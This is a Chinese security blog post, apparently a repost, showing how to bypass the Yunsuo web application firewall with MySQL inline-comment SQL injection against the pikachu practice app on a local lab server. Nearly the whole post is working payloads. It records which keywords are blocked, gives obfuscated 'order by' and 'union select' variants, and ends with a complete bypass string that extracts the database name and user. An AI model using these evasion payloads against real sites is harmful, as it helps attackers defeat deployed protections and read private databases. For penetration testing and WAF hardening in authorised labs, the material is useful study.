内联注入绕云锁

admin 2021年4月30日09:10:51评论139 views字数 892阅读2分58秒阅读模式

云锁官网
https://www.yunsuo.com.cn/
下载的是公有云版本 云锁服务器端Windows版本

搭建的服务器是phpstudy版本的 Apache+mysql

使用的漏洞集成是pikachu的字符型SQL注入

漏洞页面

http://192.168.17.13/pikachu/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2

内联注入绕云锁

判断当前字段数

payload: kobe' order by 2 --+
and 1=1 --+ 不拦截
and 1=2 --+ 不拦截
order by 拦截了

http://192.168.17.13/pikachu/vul/sqli/sqli_str.php?name=kobe%27%20order%20by%203%20--+&submit=%E6%9F%A5%E8%AF%A2

内联注入绕云锁

使用内联注入 /!100001by/ /!500005by/

bypass: kobe' order /!10001by/2

内联注入绕云锁

判断显示位置

kobe' and 1=2 union select 1,2 --+
拦截了union select

内联注入绕云锁

union 不拦截
select 不拦截
union select 拦截
union 字符 select 拦截
union /select/ 不拦截

bypass: kobe' and 1=2 union /!10000all select/ 1,2 kobe' and 1=2 union /!50000all select/ 1,2
显示的位置为1和2

内联注入绕云锁

拦截了database() ,use()
bypass:database/**/() user/**/()

完整的bypass语句:kobe' and 1=2 union /!50001all select/ database/**/(),user/**/() --+

内联注入绕云锁

相关推荐: Devguru:1靶机渗透

Devguru:1靶机渗透 网络结构: 环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24 网络由攻击机kali、靶机组成 靶机ip:192.168.1.143 kali linux ip:192.168.1.137 信息收集:…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月30日09:10:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内联注入绕云锁http://cn-sec.com/archives/246419.html